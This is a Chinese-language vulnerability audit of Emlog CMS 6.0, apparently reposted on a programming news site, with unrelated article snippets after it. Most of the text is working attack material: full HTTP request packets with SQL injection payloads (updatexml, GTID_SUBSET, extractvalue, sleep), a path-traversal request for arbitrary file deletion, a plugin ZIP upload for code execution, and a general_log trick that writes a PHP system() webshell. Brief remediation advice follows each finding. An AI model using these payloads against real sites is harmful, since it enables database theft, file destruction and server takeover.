1、EmlogCms代码审计

一、SQL注入

1、后台标签删除处存在1处sql注入

漏洞条件

● 漏洞url:  http://emlog6.0.com/admin/tag.php?action=dell_all_tag
● 漏洞参数:tag[xx]
● 是否存在限制:无
● 是否还有其他条件:action=dell_all_tag,token

复现

POST /admin/tag.php?action=dell_all_tag HTTP/1.1
Host: emlog6.0.com
Content-Length: 65
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://emlog6.0.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://emlog6.0.com/admin/tag.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: em_advset=block; posterurl=http%3A%2F%2Femlog6.0.com%2F; postermail=22%40qq.com; commentposter=aaa; PHPSESSID=oqlj6bcle1k5ukcrfnj52e99j4; EM_AUTHCOOKIE_MplDHGA7WnMHlJcetCXbqfVJOSdPCZEb=emm666%7C%7C0284ab7039de5516859580dcfca2e03a; EM_TOKENCOOKIE_5981f06dafb0e1c6acd33302c370c4dd=f03cfe2175392b6fea4d5d25ef72278f
Connection: closec%5B111+or+sleep(1)%5D=1&token=f03cfe2175392b6fea4d5d25ef72278f
延时倍数

在这里插入图片描述

代码

tags变量键值分离,针对键做了数据库操作

在这里插入图片描述
在这里插入图片描述

修复建议

对用户的输入验证和过滤。使用预编译和转义函数。

2、后台评论处评论者标签下来自处存在1处sql注入

漏洞条件

● 漏洞url:  http://emlog6.0.com/admin/comment.php?action=delbyip&ip=127.0.0.1&token=ee4b851eb3f103685da3bbbdd7837051
● 漏洞参数:ip
● 是否存在限制:单引号闭合;需要登录后台获取token
● 是否还有其他条件:action=delbyip&ip=&token参数都必须存在

复现

功能位置--评论--

在这里插入图片描述

payload:' and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)
GET /admin/comment.php?action=delbyip&ip=1'and+updatexml(1,concat(0x7e,(SELECT+%40%40version),0x7e),1)--+kjdX&token=123e2dd43ef80874d0fe4975866fdf19 HTTP/1.1
Host: emlog6.0.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://emlog6.0.com/admin/comment.php?active_del=1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: em_advset=block; em_sort_new=inline-block; PHPSESSID=2i21vnksbvj4kjcntdm2tq8265; EM_AUTHCOOKIE_Di1QoHFKhsmGv58a4JrR5r2U8w3TS3wz=admin%7C%7Cea43ac510b8f06cad8d2bbf9f032c6a6; EM_TOKENCOOKIE_db64d83ec02ed684b1f95dd4423692cb=123e2dd43ef80874d0fe4975866fdf19; em_logpwd_3=9999; commentposter=admin; posterurl=http%3A%2F%2Femlog6.0.com%2F
Connection: close

在这里插入图片描述
在这里插入图片描述

代码

get接收ip变量没有使用addslashesh函数过滤,sql语句里有单引号,直接闭合就可以

在这里插入图片描述
在这里插入图片描述

修复建议

对用户的输入验证和过滤。使用预编译和转义函数。

3、后台外观-导航-添加页面到导航添加处存在2处报错注入

漏洞条件

● 漏洞url:  http://emlog6.0.com/admin/navbar.php?action=add_page
● 漏洞参数:pages[x]=y
● 是否存在限制:无
● 是否还有其他条件:action=add_page

复现

第一处
POST /admin/navbar.php?action=add_page HTTP/1.1
Host: emlog6.0.com
Content-Length: 94
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://emlog6.0.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://emlog6.0.com/admin/navbar.php?error_e=1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: em_advset=block; em_sort_new=inline-block; em_link_new=inline-block; em_custom_text_new=inline-block; commentposter=admin; posterurl=http%3A%2F%2Femlog6.0.com%2F; PHPSESSID=pk3dk4qk2v7s89ef1e7ckm7851; EM_AUTHCOOKIE_Di1QoHFKhsmGv58a4JrR5r2U8w3TS3wz=admin%7C%7Cea43ac510b8f06cad8d2bbf9f032c6a6; EM_TOKENCOOKIE_db64d83ec02ed684b1f95dd4423692cb=24225d813e551487a6648954b0b94a32; em_logpwd_9=1234567
Connection: closepages%5B6%5D=2'+AND+GTID_SUBSET(CONCAT(0x7e,(SELECT+database()),0x7e),8959)+AND+'RNzK'%3d'RNzK

在这里插入图片描述

第二处
POST /admin/navbar.php?action=add_page HTTP/1.1
Host: emlog6.0.com
Content-Length: 96
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://emlog6.0.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://emlog6.0.com/admin/navbar.php?error_e=1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: em_advset=block; em_plugin_new=block; posterurl=http%3A%2F%2Femlog6.0.com%2F; PHPSESSID=k1dnnurltjs04ug26am3hvj127; EM_TOKENCOOKIE_768a2d877f865edd16df5b714a9a06de=a900039784be46353b3d41fed6e684ec; postermail=22%40qq.com; commentposter=aaa; EM_AUTHCOOKIE_xul7zSEN1X7zDYShl6SvaxwZYhrQOepm=admin%7C%7Cc283aa764f471126b136d9acfbebd54f
Connection: closepages%5B2+AND+GTID_SUBSET(CONCAT(0x7e,(SELECT+database()),0x7e),8959)+AND+'RNzK'%3d'RNzK'%5D=111

在这里插入图片描述

代码

如果 pages 参数存在并且有值,则将其值赋给变量 $pages,否则将 $pages 赋值为空数组。遍历了一个名为 $pages 的数组。在每次迭代中,它从数组中取出一个键值对,其中键是 $id,而值是 $title。从接收到sql语句都没有任何过滤

在这里插入图片描述
在这里插入图片描述

修复建议

对用户的输入验证和过滤。使用预编译和转义函数。

4、后台外观-侧边栏保存组件排序处存在1处sql注入

漏洞条件

● 漏洞url:  http://emlog6.0.com/admin/widgets.php?action=compages
● 漏洞参数:widgets[]
● 是否存在限制:无
● 是否还有其他条件:action=compages

复现

POST /admin/widgets.php?action=compages HTTP/1.1
Host: emlog6.0.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 125
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Cookie: em_advset=block; em_sort_new=inline-block; em_custom_text_new=inline-block; posterurl=http%3A%2F%2Femlog6.0.com%2F; postermail=22%40qq.com; commentposter=aaa; PHPSESSID=1k2r5e2fgke63vjqv3gbn1mkf6; EM_AUTHCOOKIE_xul7zSEN1X7zDYShl6SvaxwZYhrQOepm=admin%7C%7Cc283aa764f471126b136d9acfbebd54f; EM_TOKENCOOKIE_768a2d877f865edd16df5b714a9a06de=3727215c7d05ed0180fa46f6b4043bd7
Origin: http://emlog6.0.com
Referer: http://emlog6.0.com/admin/widgets.php?activated=1
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzipwgnum=1&widgets%5B%5D=search&widgets%5B%5D=archive&widgets%5B%5D=link'and/**/extractvalue(1,concat(char(126),database()))and'

在这里插入图片描述

代码

widgets参数存在就将它序列化,不存在赋值为空,

在这里插入图片描述

如果 $isSyntax 的值为假,即值为0或为空,$value 则被赋值为在其两侧加上单引号的字符串,即 ' . $value . '。

在这里插入图片描述

修复建议

对用户的输入验证和过滤。使用预编译和转义函数。

二、文件操作

1、后台系统-数据库备份删除处存在任意文件删除

漏洞条件

● 漏洞url:  http://emlog6.0.com/admin/data.php?action=dell_all_bak
● 漏洞参数:bak[]
● 是否存在限制:无
● 是否还有其他条件:action=dell_all_bak

复现

在自己的文件夹创建文件,可实现跨目录删除文件
POST /admin/data.php?action=dell_all_bak HTTP/1.1
Host: emlog6.0.com
Content-Length: 27
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://emlog6.0.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://emlog6.0.com/admin/data.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: em_advset=block; em_plugin_new=block; commentposter=admin; posterurl=http%3A%2F%2Femlog6.0.com%2F; PHPSESSID=k1dnnurltjs04ug26am3hvj127; EM_AUTHCOOKIE_xul7zSEN1X7zDYShl6SvaxwZYhrQOepm=admin%7C%7Cc283aa764f471126b136d9acfbebd54f; EM_TOKENCOOKIE_768a2d877f865edd16df5b714a9a06de=a900039784be46353b3d41fed6e684ec
Connection: closebak%5B%5D=../../../../1.txt

在这里插入图片描述

代码

bak参数存在且是数组,就会执行删除操作

修复建议

加强用户输入验证,并限制用户所能删除的文件范围。

2、后台系统-插件处存在1处文件上传漏洞

漏洞条件

● 漏洞url:  http://emlog6.0.com/admin/plugin.php?action=upload_zip
● 漏洞参数:filename
● 是否存在限制:上传的文件和文件夹的名字相同
● 是否还有其他条件:action=upload_zip,name=pluzip

复现

POST /admin/plugin.php?action=upload_zip HTTP/1.1
Host: emlog6.0.com
Content-Length: 629
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://emlog6.0.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary2DpnCXUHc5otIBms
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://emlog6.0.com/admin/plugin.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: em_advset=block; em_plugin_new=block; posterurl=http%3A%2F%2Femlog6.0.com%2F; PHPSESSID=k1dnnurltjs04ug26am3hvj127; EM_TOKENCOOKIE_768a2d877f865edd16df5b714a9a06de=a900039784be46353b3d41fed6e684ec; postermail=22%40qq.com; commentposter=aaa; EM_AUTHCOOKIE_xul7zSEN1X7zDYShl6SvaxwZYhrQOepm=admin%7C%7Cc283aa764f471126b136d9acfbebd54f
Connection: close------WebKitFormBoundary2DpnCXUHc5otIBms
Content-Disposition: form-data; name="pluzip"; filename="text.zip"
Content-Type: application/x-zip-compressed请求内容不显示:PK

在这里插入图片描述

上传后直接访问解压后端文件

在这里插入图片描述

代码

先判断上传的文件是否存在,如存在就判断上传的后缀是否为zip,在将上传的zip文件进行解压操作

在这里插入图片描述

对压缩包里的文件名称进行判断,如果压缩包名称为test则压缩包里必须存在test.php文件,否者会进行报错

在这里插入图片描述

修复建议

修复文件上传漏洞需要限制上传文件类型、验证文件的MIME类型、设置文件上传大小限制、实施恶意文件扫描,以及避免执行上传的文件,从而确保服务器的安全性。

3、后台数据库备份拿shell

漏洞条件

● 漏洞url:  http://emlog6.0.com/admin/data.php?action=import
● 漏洞参数:
● 是否存在限制:需要高数据库权限
● 是否还有其他条件:action=import,name=sqlfile, filename=参数存在

复现

数据库拿shell主要有两种方式:
1、select …into outfile  利用需要的条件有:
● 对web目录需要有写权限;
● 能够使用单引号;
● 知道绝对路径;
● secure-file-priv值必须为空(不能为null)
2、开启mysql日志记录general_log,将日志写入特定目录下,利用条件有:
● 对web目录需要要写权限;
● 能够使用单引号;
● 知道绝对路径;
● 能够执行多行sql语句。第一种方法,先备份sql语句,在其基础上插入select “<?php phpinfo(); ?>” into outfile ‘eval.php’语句就ok了,但是默认secure-file-priv值null,这个方法行不通。
● 其中当参数 secure_file_priv 为空时,对导入导出无限制
● 当secure_file_priv 值为一个指定的目录时,只能向指定的目录导入导出
● 当secure_file_priv 值被设置为NULL时,禁止导入导出功能

在这里插入图片描述

第二种方法:数据库备份-编辑备份内容-导入编辑好的sql文件,直接访问生成的文件
#开启日志记录
set global general_log='on';
#设置日志记录的路径
SET global general_log_file='D:/phpstudy_pro/WWW/cms/emlog_6.0.0/src/eval1.php'; 
#任意查询恶意内容都会被保存到日志
SELECT '<?php phpinfo();?>';
注意:开启sql日志记录和设置日志路径文件需要高数据库权限

在这里插入图片描述

当前网站的数据库权限为,cms安装时选择的用户,

在这里插入图片描述

详细请求数据包
POST /admin/data.php?action=import HTTP/1.1
Host: emlog6.0.com
Content-Length: 1086
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://emlog6.0.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfPRivdhzWTTFgYdA
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://emlog6.0.com/admin/data.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: em_advset=block; posterurl=http%3A%2F%2Femlog6.0.com%2F; postermail=22%40qq.com; commentposter=aaa; PHPSESSID=0b2864j2ah3vhq7ouift3i53i3; EM_AUTHCOOKIE_I8ovfEdc33MzTKkbau3AYXkL5WEBeWQF=emm666%7C%7Cd989e69e972e2e1e490cd83d89356916; EM_TOKENCOOKIE_8bd3e1f19392195216b74e3a316ab187=d1709c4b7c5cadfa5c1e988f39e0eed1; EM_AUTHCOOKIE_MplDHGA7WnMHlJcetCXbqfVJOSdPCZEb=emm666%7C%7C0284ab7039de5516859580dcfca2e03a; EM_TOKENCOOKIE_5981f06dafb0e1c6acd33302c370c4dd=0d1a684b7b31b8048948247ab4fce60f
Connection: close------WebKitFormBoundaryfPRivdhzWTTFgYdA
Content-Disposition: form-data; name="token"0d1a684b7b31b8048948247ab4fce60f
------WebKitFormBoundaryfPRivdhzWTTFgYdA
Content-Disposition: form-data; name="sqlfile"; filename="emlog_20240102_213007.sql"
Content-Type: application/octet-stream#version:emlog 6.0.0
#date:2024-01-02 21:30
#tableprefix:emlog_
DROP TABLE IF EXISTS emlog_link;
set global general_log='on';
SET global general_log_file='D:/phpstudy_pro/WWW/cms/emlog_6.0.0/src/eval99.php'; 
SELECT '<?php phpinfo();?>';
CREATE TABLE `emlog_link` (`id` int(10) unsigned NOT NULL AUTO_INCREMENT,`sitename` varchar(30) NOT NULL DEFAULT '',`siteurl` varchar(75) NOT NULL DEFAULT '',`description` varchar(255) NOT NULL DEFAULT '',`hide` enum('n','y') NOT NULL DEFAULT 'n',`taxis` int(10) unsigned NOT NULL DEFAULT '0',PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;INSERT INTO emlog_link VALUES('1','emlog.net','http://www.emlog.net','emlog官方主页','n','0');#the end of backup
------WebKitFormBoundaryfPRivdhzWTTFgYdA--

在这里插入图片描述

直接访问即可

在这里插入图片描述

此时数据库的记录已经开启,且写入文件为上面的指定php文件,我们很多设计到数据库的操作都会被记录,
比如用户登录的时候,一定会将传入的账户密码带入数据库查询,我们可以直接在登录的时候,传入payload,
<?php system(calc);?>
然后刷新日志文件eval99.php即可触发

在这里插入图片描述

代码

导入备份文件,日志默认记录,被配文件会被日志执行sql语句

在这里插入图片描述
在这里插入图片描述

修复建议

修复GetShell漏洞的方式是严格限制并检查文件上传,设置正确的文件权限,以及合理配置服务器以防止不安全的文件执行。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/509514.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

从零开始搭建web组态

成果展示&#xff1a;by组态[web组态插件] 一、技术选择 目前只有两种选择&#xff0c;canvas和svg Canvas: 是一个基于像素的渲染引擎&#xff0c;使用JavaScript API在画布上绘制图像&#xff0c;它的优点包括&#xff1a; Canvas渲染速度快&#xff0c;适合处理大量图像和…

是真的免费!企业 AI 学习指南:Azure 2024 年学习生成式 AI 的顶级免费资源

微软的Azure AI学习专家为了帮助企业员工快速上手AI工具&#xff0c;特别准备了一些课程&#xff0c;事先说明&#xff0c;微软出品&#xff0c;完全免费&#xff0c;非割韭菜课程&#xff01; 课程浅显易懂&#xff0c;而且每节课后都会有小结、知识测试&#xff0c;帮助复习知…

Linux配置网卡功能

提示:工具下载链接在文章最后 目录 一.network功能介绍二.配置network功能2.1 network_ip配置检查 2.2 network_br配置2.2.1 配置的网桥原先不存在检查2.2.2 配置的网桥已存在-修改网桥IP检查2.2.3 配置的网桥已存在-只添加网卡到网桥里检查 2.3 network_bond配置检查 2.4 netw…

虹科新品|Baby-LIN第三代系列产品全面升级,重塑车辆测试新体验

导读&#xff1a;虹科Baby-LIN系列产品&#xff08;LIN和CAN总线模拟器&#xff09;是在测试和生产领域控制车辆部件(ECU)的成熟解决方案。虹科Baby-LIN系统能够可靠地连接到各类自动化和测量设备&#xff0c;为汽车零部件&#xff08;如电机执行器、车灯、门板、方向盘等&…

OpenGL 实现色温、色调、亮度、对比度、饱和度、高光

1.简介 色温&#xff1a;简单理解是色彩的温度&#xff0c;越低越冷如蓝色&#xff0c;约高越暖如红色。 亮度&#xff1a;增加就是给图片所有色彩加白色&#xff0c;减少加黑色。注意是只加黑白两种颜色&#xff0c;不然容易跟纯度弄混。 对比度&#xff1a;增加就是让白的…

海思hi3519dv500,hi3516dv500移植yolov8-模型处理

上一节yolov8的训练已经完成了,现在要开始做模型的转换了,这里和yolov7方式相似,但是有一些差异,尤其是yolov7的不带NMS部分的输出顺序和yolov8的输出顺序与格式是有差异的。 首先还是要自己手动加入rpn_op,这里包含了filter,sort,nms部分。 我们一个一个看,首先filter.py…

物联卡禁止个人使用是有原因的,技术层面给大家深度分析一下

运营商禁止物联卡个人使用是硬性规定&#xff0c;但是现在很有很多不法商贩在倒卖物联卡给个人&#xff0c;套路是很多的&#xff0c;小编之前的文章里有几篇深度介绍&#xff0c;大家可以搜索看一下&#xff0c;今天就从技术层面来给大家详细分析一下为什么物联卡不适合个人使…

JVM 基础知识学习笔记

JVM 基础知识学习笔记 1. JVM 介绍 什么是 JVM ? JVM 本质上是一个运行在计算机上的程序&#xff0c;它的职责是运行 Java 字节码文件。 JVM 的功能是什么 ? 解释和运行: 对字节码文件中的指令&#xff0c;实时的解释成机器码&#xff0c;让计算机执行。内存管理: 自动为…

教师资格证考试准考证无法打印

教师准考证无法打印&#xff1f; 在打印准考证的时候&#xff0c;发现点击”下载准考证“时毫无反应&#xff0c;后来在网上找到了一个有效的解决方法&#xff0c;现在记录一下。 在准考证显示页面&#xff0c;鼠标右键单击&#xff0c;找到”检查“ 在弹出来的框里选择”控制…

卷积神经网络(CNN)原理与实现

卷积神经网络(CNN) 卷积神经网络原理卷积神经网络的数学推导卷积层反向传播算法数学推导卷积层实现代码 卷积神经网络(CNN) 卷积神经网络原理 卷积神经网络是一种用于图像、语音、自然语言等数据的深度学习模型&#xff0c;其核心思想是使用卷积操作提取输入数据的特征&…

Linux - 安装 maven(详细教程)

目录 一、下载二、安装三、配置环境变量四、镜像资源配置 一、下载 官网&#xff1a;https://maven.apache.org/download.cgi 打开 maven 的官网下载页面&#xff0c;点击 bin.tar.gz 文件链接 即可下载最新版本的 maven 如果想要下载旧版本的 meven&#xff0c;则点击 Maven…

ABAP 左连接 inner join

左连接& inner join 目录 左连接& inner join问题原因总结 问题 模具分摊程序&#xff1a;报废不出来的部分有问题&#xff0c;加上过滤条件之后&#xff0c;少了很多条&#xff0c;原来2月份的有15条&#xff0c;加上之后只有9条 原因 这里加就是在左连接的基础上…